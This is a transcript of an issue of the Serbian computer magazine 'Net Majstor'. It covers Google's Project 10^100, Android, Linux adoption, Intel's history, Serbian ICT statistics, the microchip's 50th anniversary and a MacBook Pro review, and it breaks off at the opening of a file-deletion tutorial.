net majstor e-magazin broj 3

60
ti

Upload: zerof

Post on 07-Jun-2015

3.179 views

Category:

Documents


13 download

DESCRIPTION

Sadrzaj:- Vesti iz sveta racunara - Security / Sigurnost i zastita- Tutoriali / Tips & Tricks - Nasi sajtovi- Programi- Mobilna telefonija- Elektronika i Nauka- Mali majstori Hacka

TRANSCRIPT

Page 1: Net Majstor E-magazin Broj 3

ti

Page 2: Net Majstor E-magazin Broj 3

Vesti iz sveta racunara

Imate ideju da pomognete svetu? Evo vam 10 miliona $

Kompanija „Gugl” će dodeliti pet puta po dva miliona dolara za ideje koje mogu da pomognu štovećem brojuljudi na Zemlji...Ako imate ideju kako da svet učinite boljim mestom za život za što više ljudi, kompanija „Gugl” želi daječuje od vas - i za to je spremna da plati do 10 miliona dolara, sve da bi učinila da se vaša zamisaorealizuje.Internet gigant je lansirao ovu inicijativu u sklopu proslave 10 godina svog postojanja.BOLJITAK - Projekat koji je nazvan „Deset na stoti” podrazumeva dodeljivanje pet puta po dva miliona dolara za idejekoje mogu da pomognu što većem broju ljudi na Zemlji.- Te ideje mogu da budu velike ili male, tehnhološki ili briljantne po svojoj jednostavnosti - ali moraju da naprave utisak.Znamo da postoje genijalne ideje kojima je potrebna novčana podrška - objavljeno je saopštenje „Gugla” u sredu ujutruna sajtu Si-En-Ena.Ideje je moguće poslati na bilo kom od 25 jezika koji podržava pretraživač „Gugl” (i na srpskom), na internet adresuwww.project10tothe100.com, sve do 20. oktobra ove godine. Svi koji se odluče da pošalju ideju, svoju zamisao morajuda opišu jasno i da odgovore na šest pitanja, od kojih je jedno: Ako vaša ideja bude realizovana, ko će imati koristi odtoga i koliko?Zaposleni u „Guglu” će do 27. januara 2009. odlučiti kojih 100 ideja zaslužuju da uđu u finalno takmičenje. Od tog danado 2. februara svi internet korisnici će moći onlajn da glasaju za ideju koja je na njih ostavila najveći utisak - oni ćeizabrati 20 najboljih. Još neimenovane sudije će od tih 20 izabrati pet pobednika, koji će za svoje projekte u maju idućegodine dobiti po dva miliona dolara.- Ne želimo da ih ograničavamo na bilo koji način. Žrelimo različite ideje. Mislimo da se genijalne ideje mogu pojaviti sbilo kojeg mesta - kaže Betani Pul, marketing menadžer „Gugla”, na spekulacije da će najbolje proći ideje koje bi sezasnivale na obezbeđenju smeštaja za beskućnike i hrane za gladne.

Google Android uskoro među nama

Najveći svetski Internet pretraživač Google, pustiće 23. septembra u prodaju svoj prvi mobilni telefon podoperativnim sistemom otvorenog koda, pod nazivom Android, preko američke filijale nemačkog operatera T-Mobile, objavljeno je u Vašingtonu.

Taj telefon će se pojaviti u širokoj potrošnji samo 10 meseci nakon što ga je Google zvanično predstavio.Telefon će nositi naziv Dream ili G1.

Sada je samo pitanje da li će se otvorena strategija kompanije Google, sa svojim operativnim sistemom

Page 3: Net Majstor E-magazin Broj 3

otvorenog koda, isplatiti u konkurenciji čuvenog multifunkcionalnog telefona iPhone američke kompanijeApple.

Pogledajte snimak »

Google bi mogao da zaseni Apple pre svega činjenicom da je Android zasnovan na sistemu otvorenog koda, štoznači da svi korisnici imaju priliku da unapređuju softverska rešenja koja Android nudi i da ih konstantnopoboljšavaju.

Potvrđena pretpostavka o sve većoj Linux zastupljenosti

Anketom, koju smo sproveli na našem sajtu, kao i snimanjem tržišta, onog dela poslovnih subjekata kojiposluju s našom kompanijom, došlo se do zaključka da je svaki treći računar u preduzećima sa operativnimsistemom Linux.

Ovo nije empirijski podatak, već podatak dobijen prebrojavanjem "Linux" instalacija. Takođe je pokazala,pomenuta anketa, da je 75% anketiranih korisnika spremno da koristi Linux operativni sistem ( 30% od togbroja je iskazalo tu spremnost nakon pohađanja određene obuke). Ovo sve navodi na zaključak da je od početkabila ispravna orijentacija naše kompanije na razvoju multiplatformskog softvera.

To će u perspektivi značiti da će se poslovni softver izvršavati na raznovrsnim platformama, (WIndows,Linux, Unix, Mac OS...) i da će korisnici imati utisak da rade na jednoj te istoj platformi. Ovaj utisak sepojačava i time što zajednica slobodnog softvera poboljšava sve više i više "office" softver, kao što jeopenOffice.org, pa on skoro u potpunosti može istisnuti Microsoft Office, bar u najvećem broju slučajeva.

Mišljenja smo da će se u budućnosti postotak Windows i Linux distribucija često menjati, čas u korist jednogili drugog operativnog sistema. Najpre će se dogoditi opstanak kritične mase Windows operativnih sistema,najviše zbog aplikacija, kao što je Microsoft Office, aplikacije za e-banking i specijalnog softvera koji radisamo na ovoj platformi. Erozivnu prazninu će popunjavati razne distribucije Linux operativnih sistema kao iMac OS-a. Posebno će se primetiti osetno povećanje tržišta Mac OS-a, zbog trenutne agresivne kampanjeApple-a na prodaji svojih računara na našem tržištu. Preduzeća koja imaju sredstava i koja drže do svog nivoa,sve više će nabavljati Apple računare sa preinstaliranim Mac OS-om, kao i druge kompanije u svetu, što ćerezultovati primetmi udelom ove platforme na tržištu.

Uz pomoć BusinessWare ERP softvera, koji je jedan od ređih multiplatformskih softvera, multiplatfomnostće dobijati sve više na značaju, jer se time štedi novac, postaje se konkurentan u odnosu na "monoplatformske"poslovne softvere, olakšava se uvođenje (deployment), nije potrebna doobuka za rad na drugim platformama(softver se ponaša identično svuda) i td.

Page 4: Net Majstor E-magazin Broj 3

Četrdeset godina Intela

Intel, danas jednu od najpoznatijih svetskih kompanija, pre četrdeset godinaosnovali su Gordon Mur, fizičar i hemičar po kome je dobio naziv poznatiMurov zakon, i Robert Nojs, fizičar koji je radio na izumu integrisanog kola.Obojica, uostalom kao i osnivači kompanije AMD - Intelovog najvećegkonkurenta, pre toga su radili na Fairchild Semiconductor institutu. Kasnije,kompaniji se pridružio i poznati akademik Endi Gruv.

Prvobitno, naziv kompanije bio je Moore Noyce, po njihovim prezimenima, alikako je suviše podsećalo na more noise (više buke) ubrzo su odustali od tog

imena, jer im asocijacija na buku ne bi donela mnogo koristi u prodaji hardvera, i odlučili se za IntegratedElectronics, skraćeno Intel. Mali problem nastao je već na početku, jer je pod tim nazivom bio registrovan lanachotela, pa su najpre morali da otkupe prava na ovo ime, nakon čega zvanična istorija i neverovatni uspeh Intelapočinje.

Godinu dana nakon osnivanja, prvi proizvod ove kompanije pojavio se na tržištu. Bila je to 3101 Schottkybipolarna random access memorija, a tada nastaje i njihov prepoznatljiv logo "dropped e". Sedište u Santa Klariu Kaliforniji osnovano je 1970. godine, a već sledeće predstavljen je prvi mikroprocesor Intel 4004, koji jeujedno bio i prvi ikada napravljen procesor na jednom čipu. Iako je za današnje poimanje to bio procesorsiromašnih mogućnosti, u to vreme, bio je revolucionaran. Te godine, kompanija Intel zaradila je 6,8 milionadolara.

Početak x86 arhitekture

1974. godine prvi pravi mikroprocesor opšte namene - Intel 8080 pojavio se natržištu i ubrzo je našao široku primenu u svakodnevnom životu.

Od Intelovog procesora 8086, koji se pojavio četiri godine kasnije, potiče imearhitekture x86, pa su se kasnije za nove procesore dodavani samo brojeviispred (80286, 80386, 80486), sve dok se početkom 1993. godine kompanijanije odlučila da za novi procesor uzme ime Pentium, marketinško ime koje jetrebalo da proizvode učini bližim javnosti, što je, kako se vremenomispostavilo, bio dobar potez. Početkom poslednje decenije dvadesetog veka,počela je i kampanja sa prepoznatljivim sloganom Intel Inside, koji je osmislioDenis Karter, a kojim se Intel predstavio kao brend namenjem običnimdomaćinstvima. Pored daleko najpoznatijeg Pentiuma, Intel izbacije i praktičnooslabljenu verziju Pentium procesora - Celeron.

U međuvremenu, kompanija je sve više rasla. Osnivači dobijaju priznanja za doprinose nauci, osnovana je Intelfondacija i vremenom, kako kompjuteri postaju dostupni široj populaciji, Intel postaje industrijski lider. Jedanod bitnih događaja u istoriji ove kompanije čini i partnerstvo sa Appleom, odnosno prelazak Macintosh računarasa Power PC na Intelovu x86 arhitekturu, a prvi takav računar pojavio se na tržištu januara 2006. godine.

Iste godine umesto slogana Intel inside, promoviše se novi - Leap ahead. Period procesora za više jezgarazapočinje 2006. godine, a Intel to čini procesorima Intel Xeon 5300 i Intel Core 2 Extreme. Dve godine kasnijestiže novina u vidu Intel Atom procesora, grupe procesora koji štede energiju, namenjenih mobilnim internetuređajima, notebook računarima i nettop uređajima.

Intel danas

Page 5: Net Majstor E-magazin Broj 3

Danas Intel posluje u 50 zemalja sa oko 300 kancelarija širom sveta. Iako je nalisti 100 najmoćnijih brendova na svetu (Brandz Ranking 2007, MillwardBrown Optimor) kompanija zabeležila značajan pad, sa 15. na 25. mestopomenute, ona i dalje važi za jednu od najznačajnijih kompanija iz ove oblastiu dosadašnjoj istoriji.

Intel zapošljava oko 85.000 ljudi, a politika zaposlenih nije tipična za kompaniju iz "Silikonske doline", i nije nipribližno neformalna i opuštena kao, na primer, u Googlu ili Sunu. Zaposleni koji određeno vreme neispunjavaju postavljene zahteve, ne ostaju dugo u kompaniji. Sa druge strane, radi širenja duha egalitarizma,nijedan zaposleni nema svoju kancelariju, pa čak ni CEO - Pol Otelini.

Intel je dobitnik priznanja od strane Working Mother magazina, kao jedna od sto najboljih kompanija zazaposlene majke, a pored toga politika firme promoviše i jednakost bez obzira na versko ili seksualnoopredeljenje svojih zaposlenih. U čast 40. godišnjice, CEO kompanije, Otelini je pozvao svoje zaposlene daučestvuju u kolektivnoj donaciji u vidu volontiranja od milion sati i time pomognu razvoju lokalnih zajednicaširom sveta, čime kompanija želi da posvedoči o svojoj korporativnoj društvenoj odgovornosti.

Upotreba IKT u Srbiji

Republički zavod za statistiku Srbije sproveo je, po treći put, istraživanje o upotrebi informaciono-komunikacionih tehnologija u domaćinstvima i preduzećima.

Jovana Milićević

Istraživanje sprovedeno po EUROSTAT metodologiji, obuhvatilo je 2000domaćinstava i 2000 pojedinaca, starosti od 16 do 74 godine, a uzorak jepodeljen na područja centralne Srbije, Beograda i Vojvodine. Istraživanje nijesprovedeno na Kosovu. Telefonskim putem, kako se ovo istraživanjesprovodilo, došlo se do podataka da u Republici Srbiji 40,8% domaćinstavaposeduje računar, što je povećanje od 6,8% u odnosu na 2007. i čak 14,3% uodnosu na 2006. godinu. Što se razlika u brojkama vezano za tip naselja tiče,urbani deo prednjači sa 47,5%, dok u ruralnim naseljima samo 31,2%domaćinstava poseduje računar, uz bitnu napomenu da je ta razlika smanjena uodnosu na 2007. godinu. Razlike su značajne i po regionima, a zastupljenost je najveća u Beogradu, čak 53,1%,zatim u Vojvodini 41,5% i najmanja u centralnoj Srbiji 34,8%.

Što se pristupa internetu tiče, 33,2% domaćinstava u Srbiji poseduje internet priključak, pri čemu i dalje najvišenjih koristi modemsku konekciju (51,1%), ali se beleži i znatan porast korišćenja širokopojasne (broadband)konekcije (15,5% ispitanika), pri čemu najveći rast u odnosu na prethodnu godinu beleži ADSL konekcija, sa12,1% na čak 24,4%. Zavisno od visine mesečnih prihoda, internet priključak većinom poseduju domaćinstvakod kojih taj prihod prelazi 600 evra, a kod onih sa prihodom do 300 evra taj procenat iznosi svega 14,6.

Kada govorimo o pojedincima, za 4,3% povećao se broj lica koja koriste računar u odnosu na prethodnu godinu,a udeo korisnika prema nivou obrazovanja pokazuje da je 76,8% lica sa višim i visokim obrazovanje koristiloračunar u poslednja tri meseca, 57,6% sa srednjim i 24,9% sa nižim obrazovanjem. Broj svakodnevnihkorisnika računara povećao se za više od 400.000, i iznosi 1,9 miliona, a internet svakog dana koristi 1,25miliona stanovnika. Kao najčešći razlozi za nekorišćenje interneta navedeni su nedostatak vremena (49,4%),spora veza (33,3%) i visoke cene bržih konekcija (20,6%).

Page 6: Net Majstor E-magazin Broj 3

Anketa je pokazala i da čak 86,3% lica koja koriste internet nikada nije kupovala ili poručivala robu i uslugeovim putem, a od onih koji to čine, 32% naručuje knjige i magazine, 30,4% računarski softver a 26,3% je puteminterneta kupovalo elektronsku opremu.

Što se preduzeća tiče, istraživanje je obuhvatilo 1096 pravnih lica sa najmanje 10 zaposlenih iz raznihprivrednih delatnosti, a rezultati ispitanog uzorka govore da čak 97,7% preduzeća koristi računar. Njih 91,5%ima pristup internetu, gde je, za razliku od domaćinstava, na prvom mestu neki oblik DSL konekcije sa 57% irastom od čak 26,4% u odnosu na 2007. godinu, dok modemska konekcija beleži smanjenje od 14,1%. ERPsistem (Enterprice Resource Planning sistem) tokom januara 2008. godine koristilo je svega 10% preduzeća i tonajčešće banke i osiguravajuća društva, a iznenadio je podatak da je broj preduzeća koji koriste ovaj sistemopao u odnosu na prethodnu godinu za čak 6,4%.

Interesantan je i podatak da je čak 17,2% preduzeća koristilo GNU/Linux operativni sistem tokom 2008.godine, što je povećanje od 2,9% u odnosu na prethodnu.

Značajan rast zabeležen je u broju onih preduzeća koja imaju svoj web sajt: 68,9%: u odnosu na 61,8%prethodne i 52,9% 2006. godine. Regionalne razlike su i ovde izražene, pa tako 77,4% beogradskih preduzećaposeduje web sajt, u Vojvodini to iznosi 67,9%, dok ga u centralnoj Srbiji ima 61% preduzeća.

Procenti koji govore o poručivanju putem interneta su i dalje niski, pa je tako samo 17% preduzeća koje imajuinternet priključak primalo porudžbine putem interneta, a procenat onih koji su naručivali proizvode i uslugeovim putem iznosi 20,8%. Na pitanje o značaju informaciono-komunikacionih tehnologija, 22,5% preduzećasmatra da je njihova upotreba doprinela reorganizaciji i pojednostavljivanju radnog procesa, 10,7% smatra da jedoprinela razvoju novih usluga, a 9,8% vezuje upotrebu ovih tehnologija za veću zaradu preduzeća.

Ovim istraživanjem, Republički zavod za statistiku osim pružanja uvida u trenutno stanje želi i da pruži osnoveza dalje planiranje razvoja informacionih tehnologija u našoj zemlji. Kompletno istraživanje možete preuzeti sasajta zavoda u PDF formatu.

Mikročip: 50. rođendan

Kako je jedan propušteni godišnji odmor pre pedeset godina uticao na to da vi imate mogućnost da čitate ovajtekst danas?

Piše: Srđan Jovanović

Page 7: Net Majstor E-magazin Broj 3

Letnji meseci te davne 1958. godine su u laboratorijama Teksas instrumentsa proticali sporo. Za mladoginženjera Džeka Kilbija (Jack Kilby), koji zbog činjenice da je bio tek zaposlen u pomenutoj kompaniji nijeimao prava na godišnji odmor, ti meseci su bili ispunjeni mirom i tišinom, a to je bilo sve što je njemu u tomtrenutku trebalo. To i laboratorija u kojoj je uporno radio na rešenju jednog od tadašnjih najvećih problema ikočnice daljeg razvoja elektronike.

Naime, Kilbi je radio na rešavanju problema tzv. „tiranije brojeva“, odnosno pokušavao je da pronađe način dameđusobno poveže svaki sa svakim veliki broj tranzistora, osnovnih komponenata elektronskih sistema togvremena. Dugo vremena pre toga inženjeri su pokušavali da reše taj problem i budući da se sa razvojem ideja zaprimenu elektronskih sklopova povećavao i broj tranzistora i ostalih komponenata neophodnih za realizaciju tihideja, potreba za opštim rešenjem povezivanja velikog broja komponenata je bila ogromna.

Najbolja rešenja su često i najjednostavnija

Rešenje koje je Kilbi ponudio je bilo više nego jednostavno. Umesto da povezuje tranzistore kao diskretnekomponente koje imaju svoje kućište i tri izvoda, Kilbi je tranzistore povezao već u samom poluprovodnuku,osnovnom gradivnom elementu tranzistora. U čemu se sastojala genijalnost Kilbijeve ideje? Ukoliko bi u rukuuzeli tipični tranzistor, primetili bi da on ima plastično ili metalno kućište, najčeće valjkastog oblika i tri izvoda,odnosno žice.

Međutim, to su samo delovi tranzistora koji su načinjeni tako velikim kako bi nama bila olakšana njegovaupotreba, dok je deo tranzistora koji je najbitniji sakriven duboko unutar njegovog kućišta. Taj deo je načinjenod poluprovodnika i manji je od 0,01 promila čitave komponente. Umesto da tranzistore povezuje u diskretnojtehnici (sa sve kućištem i žičanim izvodima) Kilbi je rešio da to obavi već u samom poluprovodniku, gde sutranzistori minijaturnih dimenzija. Uvidevši da je i veliki broj ostalih komponenata (diode, otpornici,kondenzatori, itd.) bilo moguće napraviti od istog poluprovodnika, Kilbi je došao na ideju da ih sve poveže najednom komadu poluprovodnika, unutar jednog kućišta.

Ta ideja je bila kamen temeljac razvoja elektronike, a samim tim i čitave nauke i tehnologije i života koji nasokružuje.

Kilbi je svoju ideju o monolitnoj (integrisanoj) izradi komponenata predstaviomenadžmentu Teksas instrumentsa 12. septembra 1958. tako što je na parčetugermanijuma (jednog od poluprovodnika) žicama povezao jedan tranzistor inekoliko ostalih komponenata i pred zapanjenim auditorijumom uz pomoćmernih instrumenata dokazao rad takvog elektronskog sklopa. To prvointegrisano elektronsko kolo, približne veličine 10mm x 1,5mm predstavljalo jeprvi konstruisani mikročip na svetu. Od tog trenutka broj tranzistora u jednommikročipu je rastao iz dana u dan, a oblasti primene mikročipova su se nizalejedna za drugom.

Godinu dana nakon Kilbijeve prezentacije, Robert N. Nojs (Robert N. Noyce),koosnivač Intela i Feirčajld semikondaktora podneo je patent Poluprovodničkeplanarne integrisane strukture, a godine 1960. u Feirčajldu je proizveden prvimikročip. Doprinos Nojsa je bila u tome što je umesto germanijuma, za osnovu(supstrat) tranzistora iskoristio silicijum, drugi poluprovodnik za koji se kasnijeispostavilo da zbog boljih karakteristika predstavlja povoljnije rešenje, kao i utome što je umesto žica, za međusobno povezivanje komponenata izrađenih u silicijumu iskoristio samsilicijum. To je u mnogome poboljšalo kvalitet izrađenih integrisanih kola pruživši mogućnost daljeg povećanjagustine pakovanja.

Kilbi

Page 8: Net Majstor E-magazin Broj 3

Kilbi i Nojs su za svoje doprinose masovnoj proizvodnji mikročipova nagrađeni američkom Nacionalnommedaljom za nauku. Pored toga, Kilbi je 2000. godine nagrađen i Nobelovom nagradom za fiziku, a sam Kilbije na svečanosti dodele nagrade iskoristio priliku i da ukaže na veliki doprinos Roberta Nojsa, koji je tada većbio pokojni.

Razvojni put mikročipa

Danas je teško zamisliti život bez mikročipova. Ima ih u svim oblastima naših života: u komunikaciji, medicini,transportu, proizvodnji i prodaji, zabavi; teško da postoji jedna oblast naših života u kojima raznovrsnamogućnost upotrebe mikročipova ne dolazi do izražaja. Ista je stvar i sa naukom. Zahvaljujući mikročipu inapretku tehnologije, uznapredovale su i mnoge nauke, kao i naš pogled na život koji nas okružuje. Mnogevelike kompanije danas se utrkuju u prozvodnji i primeni mikročipova. A nije uvek bilo tako.

Uprkos očiglednim prednostima mikročipa u odnosu na diskretnu tehnologiju (manja cena izrade, boljeperformanse, izuzetno manja veličina), bilo je potrebno da prođe određeno vreme pre nego što im je industrijapronašla praktičnu primenu. Kao što to obično i biva sa novim tehnologijama, prvo su vojska i ostale američkevladine organizacije pokazale interesovanje za upotrebu mikročipova. Godine 1961. Teksas instruments je zapotrebe američke avijacije napravio tzv. „Molekularni elektronski kompjuter“, uređaj koji je u praksidemostrirao da je bilo moguće zameniti 8500 tranzistora sa 587 mikročipova. NASA je takođe tih ranihšezdesetih pokazivala zainteresovanost za mikročipove: određeni broj mikročipova je bio ugrađen u Apolovkontrolni računar, kao i u Interplanetarnu sondu za monitoring koja je poslata usvemir davne 1963.

Godine 1962. Teksas instruments je potpisao ugovor sa Autonetiks divižn ovNort American aviejšon za dizajniranje 22 različita mikročipa koji će se kasnijeiskoristiti za Minuteman I i Minuteman II raketne navodeće sisteme. Bila je ovoprva upotreba mikročipa u neke vojne svrhe. Do 1965. američka avijacija jeistisnula NASA-u sa vodećeg mesta na svetskoj rang listi kupaca mikročipova.

Koosnivač Intela Gordon Mur (Gordon Moore) je takođe odigrao važnu uloguu evoluciji mikročipova. U to vreme (1965) još uvek radeći kao direktor uFeirčajldu, Mur je napisao interni rad na temu „Budućnost razvoja integrisane elektronike“, u kome je pokušaoda predvidi pravac i tempo razvoja integrisane elektronike u narednih deset godina. Mur je izneo procenu da ćebroj komponenti po jednom čipu na kraju te godine dostići 65000 i da će se taj broj duplirati svakih dvanaestmeseci. Ovakva formulacija razvoja integrisane tehnologije danas je poznata kao Murov zakon i predstavljaosnovu za razvoj računarske industrije u poslednje četiri decenije.

Šezdesetih godina prošlog veka kalkulatori su bili robusne mašine veličine današnjih računara, koje su seuključivale u mrežno napajanje, kako bi uz veliku potrošnju električne energije došli do validnih kalkulacija.Mikročipovi su promenili sve to. Nipon kalkulejting mašin korporejšon je 1969. godine poručila od Intela 12različitih mikročipova, specijalno dizajniranih za potrebe izrade njihovog najnovijeg kalkulatora, Busicom 141-PF .

Budući da su već uveliko kasnili sa rokom isporuke, tri Intelova inženjera Ted Hof, Federiko Fagin i StenMazor predložili su alternativu u dizajnu: izradu familije od četiri mikročipa, od kojih bi jedan mogao bitinaknadno programiran za upotrebu u različitim proizvodima. Tako je rođen 4004, prvi mikroprocesor koga jebilo moguće kupiti na slobodnom tržištu. Iako približne veličine od samo 4,5mm sa 3mm, ovaj mikroprocesorje bio u stanju da izvrši isti broj operacija u vremenu kao i njegov daleki prethodnik ENIAC napravljen još1949, sa jednom razlikom: ENIAC je bio napravljen od 18000 vakuumskih cevi i bio je veličine jedne povećesobe!

Originalan Kilbijev mikročip

Page 9: Net Majstor E-magazin Broj 3

Dalji razvoj, vođen ekonomskim faktorima doveo je sredinom sedamdesetih do pojave LSI (Large ScaleIntegration) mikročipova sa gustinom pakovanja od desetak hiljada tranzistora po čipu. Čipovi za kalkulatore,razne memorije i prvi mikroprocesori su imali do oko 4000 tranzistora, dok je prava LSI tehnologija osvojenaoko 1974., za proizvodnju memorija za računare i mikroprocesore druge generacije. Nakon ovoga je usledioVLSI (Very Large Scale Integration), korak koji traje i dan danas, počevši od nekoliko stotina hiljada tranzistorau ranim osamdestim, preko jednog miliona tranzistora na čipu (1986. u memoriji i 1989. u mikroprocesoru) pasve do nekoliko milijardi tranzistora (2005. dostignuta jedna milijarda), koliki je red gustine pakovanjadanašnjih mikroprocesora.

Kuda dalje?

Razvoj mikročipova je nezaustavljiv: kako tehnologija napreduje, sve većegustine pakovanja postaju realnije, što inženjerima pruža mogućnost zarealizaciju sve kompleksnijih funkcija unutar jednog čipa. Novi mikročipovi seugrađuju u uređaje koji pomažu razvoj novih i boljih tehnologija. Sve ovo ličina začaran krug koji kao rezultat ima munjeviti razvoj društva, tzv.informatičku revoluciju.

Gledajući u budućnost, u narednih pedesetak godina, ma koliko to bio smeo ičesto nepromišljen potez (izuzimajući g. Mura i njegov već pomenuti zakon koji i dan danas važi), usledpotrebe za još većom brzinom, manjom potrošnjom energije, kao i usled brige o recikliranju i očuvanju životnesredine, dolazimo do zaključka da će se izgled mikročipa u velikoj meri promeniti. Već sada se vodeće svetskekompanije umesto povećanja radnog takta radije odlučuju za povećanje broja jezgara unutar mikroprocesora.

Takođe, pokušavaju da promene koncept prenošenja informacija unutar mikročipa sa žičanog prenosa na prenosputem svetlosti. Potrebe za sve većom količinom podataka za čuvanje otvaraju pitanje organizacije memorije ukule, tj. u visinu, za razliku od današnje upotrebe planarnih struktura, kao i upotrebu organskih materija zasmeštanje memorije. Bilo kako bilo, proslava jednog veka postojanja mikročipa verovatno će nam doneti istukoličinu uzbuđenja i divljenja, bilo da posmatramo njegovu evoluciju ili sagledavamo mogućnosti njegovogdaljeg razvoja.

Stigao je novi MacBook Pro

Kompanija Apple poznata je po kvalitetnom softveru i hardveru, a do nas je stigao novi model njihovogMacBook Pro računara.

Nebojša Rašković

Kada govorimo o kompaniji Apple ono što nam uvek prvo padne na pametjeste vrhunski hardver upakovan u elegantno dizajnersko rešenje koje privlačiapsolutno svakog ko ga ugleda. Za ovog proizvođača je između ostalogkarakteristično i to da sve svoje grupe proizvoda osvežava na godišnjem nivou,što je slučaj i sa MacBook Pro familijom laptop računara koja je polovinomleta dobila svoje nove predstavnike. Mi smo imali prilike da se bolje upoznamosa trenutno najjačamo petnaesticom i nećemo biti nimalo skromni ako kažemo

da se možda radi i o najboljem notebook računaru na svetu. Šta je to konkretno po čemu se MacBook Proizdvaja od ostalih laptop mašina... Prvi Apple računari bili su zasnovani na seriji procesora kompanije Motorola(Motorola 680x0), da bi nakon toga bio predstavljen i Mac sa PowerPC procesorom. Ove procesore proizvodilisu Freescale i IBM i na njima su sve Apple mašine veomo dobro funkcionisale. Do pre samo godinu i po dana

Tranzistor izrađen u diskretnojtehnici pod rentgenom

Page 10: Net Majstor E-magazin Broj 3

Freescale PowerPC G4 procesori bili su ugrađivani samo u prenosne računare, dok je IBM proizvodio moćnijeG5 procesore koji su bili predviđeni za Appleove desktop mašine. Ipak, usled nemogućnosti daljegnapredovanja po pitanju brzine, odnosno radnog takta, što se posebno odnosilo na G4 modele namenjeneprenosnim računarima, ali i prevelikog zagrevanja IBM PowerPC G5 procesora, Apple je rešio da se okrenenovoj Intel Core arhitekturi.

Mnogi su u početku mislili da će prelaskom na Intel x86 procesore Mac nestati, što se naravno nije dogodilo. Zaone koji ne znaju, osnovu Mac platforme čini Mac OS X, a svi novi Mac računari zasnovani na Intelprocesorima i dalje koriste ovaj operativni sistem. Ono što je kod aktuelnih računara baziranih na Intelprocesorima evidentno jeste da su sada nesumnjivo brži, kao i da nude mogućnost instaliranja Windows XP iliVista operativnih sistema, što ih je automatski učinilo još atraktivnijim za krajnje kupce. Potrošači time dobijajuračunar koji radi i sa Mac OS X platformom (koja slovi za jednu od najnaprednijih i najbezbednijih) i saWindows operativnim sistemima.

Dizajn i performanse

Minimalistički sadržaj je nešto na šta smo već navikli kada su Apple proizvodi u pitanju, pa smo porednotebooka u prelepoj crnoj kutiji našli još samo par kratkih brošura o proizvodu, kabl sa adapterom za napajanjei dva instalaciona diska. Po postavljanju računara na radni sto odmah se uočava besprekorna izrada koja, ponašem mišljenju, za nijansu odskače u poređenju sa prethodnom generacijom. Sam laptop je kompletnonapravljen od brušenog aluminijuma, čija je površina presvučena posebnim materijalom koji dodatno osiguravaračunar od ogrebotina i oštećenja. Finiš je sjajan - naprosto ne postoji detalj na koji dizajneri nisu obratili pažnjui to posebno naglašavamo.

U vizuelnom segmentu novi MacBook Pro podseća na svoje prethodnike, mada se boljim posmatranjem možeuočiti par sitnica koje ga čine posebnim. Naravno, njihova uloga u realnom radu je nikakva - čista estetika.Tastatura na novom Macu je doživela blago unapređenje - tasteri su veliki, imaju plitak hod i osrednji otpor prikucanju, što se u praksi pokazalo kao jedno od najboljih rešenja za većinu korisnika notebook računara. Usuštini za prijatan rad sa tasturom velikim delom je zaslužna nova Apple tehnologija (slična Logitechovojscissor switch), koja je nastala upravo sa željom da obezbedi što lagodniji rad za MacBook Pro mašinom.

Srce testiranog modela čini Intelov Core2 Duo procesor na radnom taktu od 2,5 GHz, a važno je napomenuti dase u aktuelnoj ponudi nalazi i model baziran procesoru od 2,4 GHz koji je dostupan po nešto nižoj ceni. Uskorose na tržištu očekuje i rešenje sa trenutno najboljim Intelovim Mobile procesorom (2,6 GHz), ali kada će se noviMacBook pojaviti sa njim nije poznato.

Dizajneri ovog lepotana su odlučili da implementiraju 2 GB DDR2 memorije (na taktu od 667 MHz), što jesasvim dovoljno i za izvršavanje najsloženijih radnih zadataka, a ako vam je neophodna veća količinaostavljeno je prostora za maksimalno još 2 GB (ukupno 4 GB). Računar koji se nama našao u rukama je došaosa HDD-om kapaciteta 250 GB (jeftiniji model ima za 50 GB manje prostora), potpisanom od stranekorporacije Fujitsu, koja važi za jednu od najboljih u njihovoj proizvodnji. Na svim našim testovima ugrađeničvrsti disk se pokazao sjajno, a posebno nas je iznenadilo koliko je tih u radu.

Page 11: Net Majstor E-magazin Broj 3

Za MacBook Pro računare je karakterističan vrhunski displej koji potpisuje par najboljih igrača u ovoj oblasti(jedan od njih je i Elo - tvorac legendarnog touch displeja na iPhoneu i iPod touchu), pa izuzetak nije ni novimodel. Rezolucija ugrađenog ekrana je 1440x900 piksela i može reći da po pitanju prikaza slike briljira.Oštrina, detalji i reprodukcija boja dovedeni su gotovo do savršenstva. Veliku odgovornost za sjajan prikazslike ima i grafički akcelarator (nvidia GeForce 8600M), koji uz odlične brzinske karateristike dolazi sa 512MB GDDR3 memorije, što će posebno obradovati kupce koji vole da se igraju. Po broju raspoloživih portovanovi Mac se ne razlikuje previše od svog prethodnika (model čije srce čini procesor na taktu od 2,3 GHz), štoznači da su i dalje su na raspolaganju dva USB 2.0 (jedan sa leve, a drugi sa desne strane), jedan DVI i jedanFireWire 800 port. Pored njih tu su još i mrežni konektor, kao i wireless adapter, koji funkcioniše po novom802.11n standardu uz podrazumevanu kompatibilnost sa prethodnim.

A softver?

Sve aktuelne verzije MacBook Pro računara se krajnjim potrošačima isporučujusa najnovijom verzijom Mac OS X operativnog sistema (radi se o ekstenziji10.5.xx, poznatijoj pod nazivom Leopard) i velikim brojem osnovnih programa(iTunes, iDVD, iChat, Safari...). Ono što je trenutno aktuelno, jeste da sepojavio veliki broj aplikacija za Leoparda, između ostalog i Microsoft Officepaket. Ono što moramo naglasiti jeste da sav softver koji dolazi uz operativnisistem funkcioniše odlično i radu sa njim nismo primetili nikakve znakovebagovitosti.

MacBook Pro je u ovom trenutku jedan od najboljih notbookova na svetu, kako po pitanju hardvesrkekonstrukcije, tako i u pogledu softverskih rešenja na kojima je bazirana. Na žalost, ni on nije baš bez mana -prednji deo se previše greje, pa je neophodno pazariti neki dobar laptop ventilator (npr. Cooler Master NotepalInfinite) kako bi se adekvatno rashladio kod dugotrajne dnevne upotrebe. Isto tako, njegova cena je za našeuslove previsoka (najslabiji model košta skoro 2.000 evra), što je opet veoma bitan faktor u omasovljavanjuApple rešenja kod domaćih potrošača. U svakom slučaju, kada se saberu ostvareni rezultati i podvuče crte možese dodati i to da je Apple sam sebi postavio domaći zadatak kada su upitanju buduća MacBook Pro rešenja zakoja verujemo da će biti podjednako atraktivna kao i aktuelna.

Page 12: Net Majstor E-magazin Broj 3

Tutoriali

Kako ukloniti fajl?

Verovatno ste se ne jednom našli u situaciji da neki fajl ne možete obrisati. Rešenje postoji, a na vama je daodlučite da sami to uradite ili poverenje poverite nekom programu.

Ana Labović

